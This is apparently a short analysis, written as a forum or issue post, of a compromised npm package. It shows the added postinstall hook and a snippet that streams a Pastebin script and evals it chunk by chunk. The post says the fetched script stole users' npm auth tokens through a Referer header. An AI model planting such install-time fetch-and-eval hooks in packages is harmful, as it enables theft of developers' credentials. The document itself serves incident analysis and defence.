The attacker modified package.json in both [email protected] and [email protected], adding a postinstall script to run build.js.
{
+ "postinstall": "node ./lib/build.js",
}This script downloads another script from Pastebin and evals its contents.
Some people have reported that this code has an issue:
r.on("data", c => {
eval(c);
});Because it doesn't wait for the request to complete, it is possible for the reqeuest to only send part of the script and the eval call to fail with a SyntaxError, which is how the issue was discovered.
pastebin (https://pastebin.com/XLeVP82h, taken down)
The script extracts the _authToken from a user's .npmrc and sends it to histats and statcounter inside the Referer header.
Has the content of the Pasetbin remained the same during the attack?
If not, what we know about the attack may be what the attacker wanted us to know, even tho he doesn't seem to be that smart!